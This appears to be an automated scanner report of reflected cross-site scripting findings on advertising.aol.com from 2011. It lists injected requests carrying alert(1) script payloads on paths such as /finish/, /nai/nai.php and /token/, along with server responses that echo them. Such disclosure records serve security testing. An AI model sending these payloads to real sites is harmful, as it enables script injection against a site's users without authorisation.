GET /36906"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:24 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/2/4/1/ |
GET /b1c7f"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:27 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/b1c7f"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/3/4/1/ |
GET /b801f"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:33 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/3/4/1/ |
GET /1e341"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:36 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/1e341"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/4/4/1/ |
GET /a144a"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:42 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/a144a"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/4/4/1/ |
GET /bbabf"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:39 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:39 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/5/4/1/ |
GET /d3ecd"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:54 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:54 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/5/4/1/ |
GET /e2375"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:28:57 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:28:57 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/e2375"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/6/4/1/ |
GET /c8368"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:46 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/6/4/1/ |
GET /1111f"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:49 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:49 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/1111f"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/7/4/1/ |
GET /3d8b9"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:30:02 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:30:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/3d8b9"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/7/4/1/ |
GET /5bf03"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:58 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:58 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/8/4/1/ |
GET /bccd4"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:46 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13368 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/bccd4"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /finish/8/4/1/ |
GET /17768"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:29:43 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:29:43 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /naif67fb"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:44:49 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:44:49 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13502 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai88df7"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:44:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:44:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13432 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... _265=s_gi('aolamn,aolsvc' s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai88df7"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php6a107"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:45:03 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:45:03 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13432 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... i('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/nai.php6a107"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.phpc40c6"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:45:00 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:45:00 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13502 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=3%0060c4f'><script>alert(1 Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:44:14 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13896 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_0' src='http://nai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/0/2/1812733584/ |
GET /bfbdd"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:15:30 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:15:30 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/bfbdd"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/0/2/1812733584/ |
GET /7b81e"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:15:27 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:15:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/0/3/295357155/ |
GET /4c934"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
